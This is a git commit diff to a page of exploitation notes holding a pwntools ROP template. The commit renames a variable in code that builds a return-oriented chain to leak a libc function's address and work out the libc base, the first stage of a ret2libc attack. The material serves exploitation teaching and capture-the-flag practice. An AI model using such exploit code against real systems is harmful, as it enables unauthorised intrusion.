GitBook: [master] one page modified

2023-12-14 19:12:55 +01:00 · 2021-03-22 11:18:24 +00:00 · 2021-03-22 11:18:24 +00:00 · bceb2bdadc
parent 307eb099ba
commit bceb2bdadc
1 changed files with 8 additions and 8 deletions
--- a/exploiting/linux-exploiting-basic-esp/rop-pwn-template.md
+++ b/exploiting/linux-exploiting-basic-esp/rop-pwn-template.md
@ -62,10 +62,10 @@ if OFFSET == b"":
 #### Find Gadgets ###
 #####################
 try:
-    print_func = "puts"
+    libc_func = "puts"
    PUTS_PLT = ELF_LOADED.plt['puts'] #PUTS_PLT = ELF_LOADED.symbols["puts"] # This is also valid to call puts
 except:
-    print_func = "printf"
+    libc_func = "printf"
    PUTS_PLT = ELF_LOADED.plt['printf']

 MAIN_PLT = ELF_LOADED.symbols['main']
@ -97,9 +97,9 @@ def generate_payload_aligned(rop):
            return payload1


-def get_addr(print_func):
-    FUNC_GOT = ELF_LOADED.got[print_func]
-    log.info(print_func + " GOT @ " + hex(FUNC_GOT))
+def get_addr(libc_func):
+    FUNC_GOT = ELF_LOADED.got[libc_func]
+    log.info(libc_func + " GOT @ " + hex(FUNC_GOT))
    # Create rop chain
    rop1 = p64(POP_RDI) + p64(FUNC_GOT) + p64(PUTS_PLT) + p64(MAIN_PLT)
    rop1 = generate_payload_aligned(rop1)
@ -117,11 +117,11 @@ def get_addr(print_func):
    # Parse leaked address
    log.info(f"Len rop1: {len(rop1)}")
    leak = u64(recieved.ljust(8, b"\x00"))
-    log.info(f"Leaked LIBC address,  {print_func}: {hex(leak)}")
+    log.info(f"Leaked LIBC address,  {libc_func}: {hex(leak)}")
    
    # Set lib base address
    if LIBC:
-        LIBC.address = leak - LIBC.symbols[print_func] #Save LIBC base
+        LIBC.address = leak - LIBC.symbols[libc_func] #Save LIBC base
        log.info("LIBC base @ %s" % hex(LIBC.address))

    # If not LIBC yet, stop here
@ -131,7 +131,7 @@ def get_addr(print_func):
    
    return hex(leak)

-get_addr(print_func) #Search for puts address in memmory to obtains LIBC base
+get_addr(libc_func) #Search for puts address in memmory to obtain LIBC base